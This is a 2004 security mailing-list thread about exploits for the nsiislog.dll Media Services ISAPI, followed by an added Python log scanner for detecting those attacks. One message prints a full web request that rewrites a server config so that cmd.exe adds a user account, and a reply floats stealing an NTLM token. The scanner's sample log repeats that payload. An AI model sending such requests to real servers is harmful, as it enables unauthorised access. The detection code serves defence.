Dailydave mailing list archives
RE: New mediaservices sploit
From: "Brett Moore" <brett () softwarecreations co nz>
Date: Sun, 14 Mar 2004 21:52:55 +1300
It's late so I may be confused... since it's Sunday, I most likely am.

Chunked Encoded Heap Overflow
http://www.microsoft.com/technet/security/Bulletin/MS03-019.mspx

Large Post Stack Overflow
http://www.microsoft.com/technet/security/Bulletin/MS03-022.mspx

And the revised bulletin last week was to fix an issue where if media services was uninstalled and then the patch was applied, and then media services was reinstalled, it would install the old vulnerable dll.

http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.c looks like an exploit for the stack based overflow... I haven't tested it but the vulnerable .dll (well it should be) is installed if somebody wants to..

Brett

-----Original Message-----
From: dailydave-bounces () lists immunitysec com [mailto:dailydave-bounces () lists immunitysec com] On Behalf Of Dave Aitel
Sent: Sunday, March 14, 2004 8:23 AM
To: dailydave () lists immunitysec com
Subject: Re: [Dailydave] New mediaservices sploit

H D Moore wrote:
| The code was posted to a few sites, it doesn't crash nor exploit
| any version of nsiislog.dll that I could find. Tested multiple
| variations on a stock Windows 2000 SP0 system without any real
| result. I am assuming that since it's in CANVAS, it actually works
| on /something/, are there any special circumstances required to
| trigger it? Does the MS03-019 patch have to be installed for it to be
| vulnerable to this MX_Stats overflow? It almost sounds like it is
| just another variation of the POST bug... is it also fixed by
| MS03-022?

Well, the POST bug was a heap overflow, and this bug is a stack overflow, so I dunno. It works on my version of nsiislog.dll, which is fairly old. It's been a while since I wrote it, so I don't remember exactly what happened with the patch situation.

| Brett actually found three bugs in this ISAPI; the original chunked
| encoding one, then the POST content overflow, and finally the one
| which was released by M$ last week. Does anyone have details on the
| latest vuln?

Last week? I think I must have missed it.

| Bonus points to anyone who can find a better way to exploit the
| unnamed bug^H^H^Hfeature below, without being dependent on an
| alternate web service or third-party software. The goal is instant
| command execution through writing a file to the system with
| arbitrary (even binary) contents. Writing to autoexec, startup, etc
| doesn't work since it requires user interaction. Assuming Windows
| 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work
| now that signatures are embedded (thanks Brett for info).
|
| GET /plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0
|
| -HD

You can't write a .asp file into the scripts directory? Or a .dll? I assume not. You're running as SYSTEM? Why not write to \\myserver\\ and steal the token and relogin through NTLM auth?

-dave

| On Saturday 13 March 2004 10:55, Dave Aitel wrote:
|
|> Securityfocus's vulnerability database isn't really that good for
|> accuracy. I checked out their update on this media services bug,
|> and noticed that one of the sploits is for something that was
|> never publicly released. This is a new bug, not the old bug that
|> Brett Moore found.
|>
|> http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.c
|>
|> (It's in CANVAS as well, btw)
|>
|> -dave
|>
|> _______________________________________________
|> Dailydave mailing list
|> Dailydave () lists immunitysec com
|> http://www.immunitysec.com/mailman/listinfo/dailydave
Attachment:
midNSIISLOG.DLL
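As an added defender-side example (not code from the thread or from any of its authors), the following Python scans IIS W3C extended log lines for the two request shapes the thread discusses: oversized POSTs to the nsiislog.dll ISAPI (the large-POST overflow) and tree.xms WriteToFile calls carrying a traversal or a pipe. The log lines, the /scripts/nsiislog.dll path and the size threshold are constructed or assumed; the chunked-encoding case cannot be seen here because W3C logs do not record request headers.

```python
from urllib.parse import unquote

# Constructed sample IIS W3C extended log (not from the original thread).
# Fields follow the #Fields: header; cs-bytes is the request size.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-bytes
2004-03-14 09:01:02 10.0.0.5 GET /default.htm - 200 311
2004-03-14 09:01:09 10.0.0.9 POST /scripts/nsiislog.dll - 200 71234
2004-03-14 09:02:15 10.0.0.9 GET /plugins/framework/script/tree.xms obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20%22|../../../../winnt/system32/cmd.exe%22) 200 0
2004-03-14 09:03:00 10.0.0.7 POST /scripts/nsiislog.dll - 200 812
"""

# Assumed threshold: legitimate nsiislog.dll posts are small log records.
LARGE_POST_BYTES = 16384


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def _int(value):
    return int(value) if value.isdigit() else 0


def classify(rec):
    """Return alert tags for one record; an empty list means nothing suspicious."""
    tags = []
    stem = rec.get("cs-uri-stem", "").lower()
    query = unquote(rec.get("cs-uri-query", "-"))  # decode %xx before matching
    if stem.endswith("nsiislog.dll") and rec.get("cs-method") == "POST" \
            and _int(rec.get("cs-bytes", "0")) > LARGE_POST_BYTES:
        tags.append("nsiislog-large-post")
    if "writetofile(" in query.lower():
        tags.append("xms-writetofile")
        if "../" in query or "|" in query:
            tags.append("writetofile-traversal-or-pipe")
    return tags


def scan(text):
    """Return (record number, client ip, tags) for every record that raises an alert."""
    alerts = []
    for i, rec in enumerate(parse_w3c(text), 1):
        tags = classify(rec)
        if tags:
            alerts.append((i, rec.get("c-ip"), tags))
    return alerts
```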